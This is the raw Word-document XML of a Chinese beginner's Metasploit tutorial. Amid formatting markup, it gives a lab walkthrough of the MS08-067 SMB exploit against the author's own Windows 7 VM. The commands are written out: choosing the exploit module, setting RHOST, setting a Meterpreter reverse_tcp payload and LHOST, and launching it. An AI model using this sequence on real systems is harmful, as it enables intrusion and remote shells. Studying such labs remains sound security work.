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Metasploit 新手知识补全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注：metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>它本身附带数百个已知软件漏洞的专业级漏洞攻击工具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rPr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输入msfconsole ,显示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3061970" cy="356743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6939" b="1728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567430"/>
                    </a:xfrm>
                    <a:prstGeom prst="snip2Same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rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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Exploit  —— 漏洞分析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Payloads —— shellCode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use exploit/windows/smb/  —— 选择漏洞利用模块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Use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exploit/windows/smb/ms08_067_net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api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ms08_067_netapi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>为所选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Show options(查看要填入的参数)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5272405" cy="12871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Set RHOST 192.168.136.131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1767840" cy="205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(我的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  <w:t>windows7)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Show options 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5270500" cy="66992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set PAYLOAD windows/meterpreter/reverse_tcp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2956560" cy="198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Show options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5273675" cy="159321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Set LHOST 192.168.136.255（我的kali）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1783080" cy="2057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Show options(此时参数全部补齐)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5268595" cy="156718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Exploit（进行攻击），失败是必然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5269865" cy="953135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961DD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A9A961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22557495"/>
    <w:rsid w:val="336F378D"/>
    <w:rsid w:val="38833649"/>
    <w:rsid w:val="40243A4A"/>
    <w:rsid w:val="40266332"/>
    <w:rsid w:val="42874596"/>
    <w:rsid w:val="43FC0A26"/>
    <w:rsid w:val="45974A62"/>
    <w:rsid w:val="4D492133"/>
    <w:rsid w:val="564103BD"/>
    <w:rsid w:val="57DA5FE2"/>
    <w:rsid w:val="609A06A7"/>
    <w:rsid w:val="60C267AF"/>
    <w:rsid w:val="7BC629FD"/>
    <w:rsid w:val="7C4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2019-07-26T06:57:41Z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